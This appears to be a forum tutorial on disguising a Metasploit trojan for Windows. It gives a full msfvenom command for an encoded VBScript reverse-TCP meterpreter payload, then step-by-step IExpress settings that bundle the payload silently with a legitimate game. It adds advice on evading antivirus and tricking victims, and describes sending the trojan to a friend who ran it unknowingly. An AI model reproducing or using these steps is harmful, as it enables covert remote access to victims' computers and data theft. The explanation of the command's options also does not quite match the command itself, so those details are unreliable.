So, we all probably know that when you run a trojan made by Metasploit, nothing will appear to happen. This is a sign for me to immediately check my Task Manager, but for an unsuspecting victim, it will just seem like a broken file. It is likely that they will delete this "broken file" once they see that it "doesn't work." In order to prevent this, we need to disguise the trojan.
This tutorial is meant to disguise trojans for Windows.
You can generate any Windows payload you want, but I would recommend encoding it in VBScript format. I find this to be detected by AV much less than an executable. I guess it's priorities. ;)
For this tutorial, I'll be encoding it with MSFvenom.
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f vbs LHOST=<IP> LPORT=<port> > root/Desktop/trojan.vbs (You can call it whatever you want.)
- msfvenom -p windows/meterpreter/reverse_tcp: This tells Metasploit what payload to use. You can do any payload you want.
- -e x86/shikata_ga_nai -i 62 -f vbs: Encoder to use, amount of times to encode, and output format.
- LHOST=yourIP LPORT=443 > /root/Desktop/trojan.vbs: This tells is what IP and port to use (make sure you put in your own IP address!) It then saves it to the Desktop.
Use a USB stick or some other way to transfer the trojan to a Windows computer.
NOTE: When I compile the trojan with the game later, just note that I'm not using the one in this screenshot. That was just a coincidence. No, I'll be using my own game. So please don't call out "That's not your game!"
Open IExpress as an administrator (this is very important!) and select "Create new Self Extracting Derivative file" and hit "Next."
The rest of the process goes as follows:
- Choose "Extract files and run installation command." (Next)
- Enter your package title (something related to your legitimate executable).
- Choose "No prompt." (Next) This will run the executable without confirmation.
- Select "Don't display license. (Next) This will keep a license screen from appearing (remember, we don't want this to look like an installer, just a regular game).
- Add your trojan and legitimate executable. In this case I'll just use a game I made for the legitimate executable. (Next)
IMPORTANT: The executable you choose must be a stand-alone, unless you manually add all of its components (.dll, etc.).
- In the "Install program" box, type "cscript trojan.vbs" or whatever your trojan is called. If it's an executable, just select your executable. In the "Post installation command," click on your legitimate executable. (Next)
- Click "Hidden." (Next)
- Select "No message." (Next) This will prevent a screen from popping up once the victim closes the legitimate executable saying "Installation complete!" or anything of the like.
- Enter the name & destination folder and check both boxes. (Next)
- Choose "No restart." (Next)
- Choose "Don't save." (Next) This will prevent IExpress from saving a save file of the executable it will generate.
- When you're ready to create the package, press "Next." Wait for it to finish.
Now it's all ready to go! Make sure you set up a listener with Metasploit! I personally uploaded this to my web server and sent the link to my friend. They ran it without any suspicion.
There's some social engineering for you, Cameron. ;)
I don't know exactly why (I think it's priority scanning), but anti-virus doesn't detect VBScripts as well as they do with executables, so your trojan will be harder to find if you did it the way I did. I passed mine by Malwarebytes with flying colors!
Not to make you paranoid, but now you know that not all trojans have to look "broken." You can make them seem very legitimate by compiling them with IExpress. You could probably do the same thing with a Linux program, but Windows trusts programs made by Windows. Microsoft needs to fix that. ;)
C|H of C3